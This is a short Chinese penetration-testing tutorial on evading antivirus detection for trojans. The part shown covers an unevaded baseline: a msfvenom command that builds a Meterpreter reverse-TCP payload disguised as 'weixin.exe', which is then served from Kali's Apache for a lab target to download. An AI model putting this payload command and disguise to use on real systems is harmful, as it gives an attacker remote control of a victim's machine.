渗透测试-木马免杀的几种方式_渗透免杀方法

前言

免杀，又叫免杀毒技术，是反病毒，反间谍的对立面，是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外，还可以扩增病毒木马的功能，改变病毒木马的行为。免杀的基本特征是破坏特征，有可能是行为特征，只要破坏了病毒与木马所固有的特征，并保证其原有功能没有改变，一次免杀就能完成了。免杀技术也并不是十恶不赦的，例如，在软件保护所用的加密产品（比如壳）中，有一些会被杀毒软件认为是木马病毒；一些安全领域中的部分安全检测产品，也会被杀毒软件误杀，这时就需要免杀技术来应对这些不稳定因素。

1、裸奔马的尝试

意为不做任何免杀处理的木马

1、使用msf的msfvenom生成木马文件，生成一个裸奔马，命名为 weixin.exe吧

命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

2、部署一下kali上的apache服务，令目标机器能够访问下载我们生成的木马

2.1、kali中是自带有apache的，启动apache服务

2.2、把生成的weixin.exe文件放在/var/www/html文件夹下

 2.3、在靶机下访问192.168.111.132/weinxin.exe，已经下载